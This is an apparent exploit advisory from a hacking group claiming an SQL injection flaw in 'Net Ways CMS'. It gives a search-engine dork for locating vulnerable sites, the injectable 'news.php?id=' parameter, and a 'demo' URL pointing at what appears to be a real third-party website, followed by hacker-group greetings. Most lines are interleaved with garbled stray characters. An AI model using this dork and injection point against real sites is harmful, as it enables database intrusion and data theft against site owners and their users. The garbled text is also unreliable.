################################################################################??######## + e/ j3 m6 P5 m3 F' n& q0 O
#
% t$ [# y+ Y1 ~. \- B% Y% {5 [7 s: x# Exploit Title : Net Ways Cms Sql Injection Vulnerability + D- e( r. q' Y$ N
# 0 Z& ]0 q6 J% [8 A- _
# Author : IrIsT.Ir 8 T3 l& z; {7 E0 s' X: p
#
2 {# K; P8 |2 t# P/ ?# m) ]1 @/ c# Discovered By : Am!r . q1 z9 Q: X& H5 H
#
8 B! [, s/ w6 D& A$ k, i# Home : http://IrIsT.Ir/forum
! n/ ?- [0 G1 A+ b% h" {#
; Q3 F$ ?2 P1 A+ h) z# Software Link : http://www.netways.com/ www.political-security.com
6 z, Q/ y8 Z% I, e) }# % s6 X/ D: @* \ _5 }. u
# Security Risk : High
! Z; B6 w% D' y4 s' d7 s+ b# 0 [& _- O/ r& V5 {( m( _, f) k
# Version : All Version & B4 j' b% G' C9 u1 H
# 9 h2 C# c9 v# w$ f
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
# J" s8 ^4 y7 a( Y5 V; y( S# ! y! r6 H) @% c- y* T' g
# Dork : intext:"Designed & developed by NetWays"
4 A& ~- l h6 Q# ' @8 b- F2 p0 n8 }" j
################################################################################??######## `0 w3 o) i& t
# ) w* R. s& Z9 v" U# ?0 j
# Expl0iTs :
0 Q# O9 V }4 _# 0 N! C6 l2 u- p" L
# http://target.com/news.php?id=[Sql]
: F4 {* g9 d" {/ I' p! h# 5 O& u# ?0 J5 E
#
! B; V% k9 ^' e& x/ q# D3mo : 9 V4 e- q' n3 Z/ q3 _; R
#
# j6 {: T2 t. w; A# ]0 ^# http://compagnieparento.com/news.php?id=7[Sql]
% G$ V/ a4 T( j6 `#
) S' @. c3 C; z- M3 ]) ?6 }8 ~################################################################################??########
- G& L0 R6 j4 `3 u [# 8 }; ]& J! P8 W0 M: T6 v% F+ I! k7 s' M
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r ! ~# b# o* M: F7 x
#
8 l: ^: ^! z8 V/ ^# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
4 e1 C$ }) t+ w* N, W7 g! U/ p#
" [) P9 D3 t* ~# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
5 Z# @8 G. }4 Y$ N# ~#
0 z: b7 e; h+ \9 n. O################################################################################??######## |